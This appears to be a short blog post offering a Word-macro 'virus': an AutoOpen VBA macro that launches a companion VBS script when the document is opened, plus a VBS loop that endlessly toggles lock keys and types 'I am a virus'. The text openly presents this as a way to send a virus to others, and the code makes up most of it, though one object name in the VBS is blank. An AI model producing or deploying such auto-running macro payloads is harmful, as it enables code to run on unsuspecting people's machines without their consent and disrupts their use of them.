Sending executables usually isn't the best option. But we can use VBA script Macro in a Word document in order to send a virus. You use these files at your own risk.
Detailed steps of how I made it and explanation of codes can be seen at:
You can download and find two files each has code:
Sub AutoOpen()
Dim wb As String Dim myPath As String Dim myWb As String
wb = "number.vbs" myPath = ActiveDocument.path myWb = """" & myPath & "" & wb & """"
' MsgBox myWb, 48
CreateObject("Wscript.Shell").Run myWb, 1, True
End Sub
set x=wscript.createobject ("") do wscript.sleep 100 x.sendkeys "{CAPSLOCK}" x.sendkeys "{NUMLOCK}" x.sendkeys "I am a virus " x.sendkeys "{SCROLLLOCK}" loop